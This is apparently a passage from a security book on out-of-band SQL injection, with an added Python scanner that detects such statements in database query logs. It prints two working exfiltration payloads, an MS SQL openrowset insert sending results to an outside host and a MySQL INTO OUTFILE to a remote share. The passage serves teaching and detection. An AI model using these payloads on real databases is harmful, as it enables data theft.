Out-of-band exploitation

To recap, out-of-band SQL injections do not show the result to the user directly, so you need a second channel to retrieve it, sometimes another data store or a network service.

The following is a common example used to exploit MS SQL Server-based vulnerabilities; it connects to another server and sends the results there:

    INSERT INTO openrowset('SQLOLEDB', 'DRIVER={SQL Server};SERVER=bigshot.beer,80;UID=sa;PWD=abretesesamo', 'SELECT * FROM students') values (@@version)

Another useful possibility, if you have remote access to the server or can extract information from it, is to send the result to a file:

    SELECT * INTO outfile '\\192.168.0.45\share\pwned.txt' FROM students;
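
Seen from the defender's side, both statements above leave a recognizable trace in database query logs. The following is an added example, not code from the book: a heuristic scanner run over a constructed sample log, in which the rule names, function names and severity levels are assumptions of this example.

```python
import re

def normalize(stmt: str) -> str:
    """Replace /* ... */ comments with a space and collapse whitespace."""
    stmt = re.sub(r"/\*.*?\*/", " ", stmt, flags=re.S)
    return re.sub(r"\s+", " ", stmt).strip()

# MS SQL ad hoc remote source: capture the SERVER= / Data Source= value.
REMOTE_SOURCE = re.compile(
    r"\bopen(?:rowset|datasource)\s*\(\s*'[^']*'\s*,\s*'[^']*?"
    r"\b(?:server|data source)\s*=\s*([^;']+)", re.I)
# MySQL file export: capture the destination path.
INTO_FILE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+'([^']+)'", re.I)
# A destination starting with \\host\ or //host/ leaves the database server.
UNC_PATH = re.compile(r"^(?:\\\\|//)[^\\/]+[\\/]")

def scan(stmt: str) -> list[tuple[str, str, str]]:
    """Return (rule, destination, severity) findings for one logged statement."""
    text = normalize(stmt)
    findings = []
    for m in REMOTE_SOURCE.finditer(text):
        findings.append(("mssql-adhoc-remote-source", m.group(1).strip(), "high"))
    for m in INTO_FILE.finditer(text):
        dest = m.group(1)
        # Hypothetical severity scale: network destination is worse than local.
        severity = "high" if UNC_PATH.match(dest) else "medium"
        findings.append(("mysql-into-file", dest, severity))
    return findings

# Constructed sample log: the first two statements are the ones shown above.
SAMPLE_LOG = [
    "INSERT INTO openrowset('SQLOLEDB', 'DRIVER={SQL Server};"
    "SERVER=bigshot.beer,80;UID=sa;PWD=abretesesamo', "
    "'SELECT * FROM students') values (@@version)",
    r"SELECT * INTO outfile '\\192.168.0.45\share\pwned.txt' FROM students;",
    "SELECT name FROM students WHERE id = 42",
    "SELECT * INTO/**/OUTFILE '/tmp/report.csv' FROM students",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for rule, dest, sev in scan(line):
            print(f"[{sev}] {rule}: {dest}")
```

The captured destination is the useful field for triage: it names the second channel, so it can be checked against the hosts and shares the database server is expected to reach.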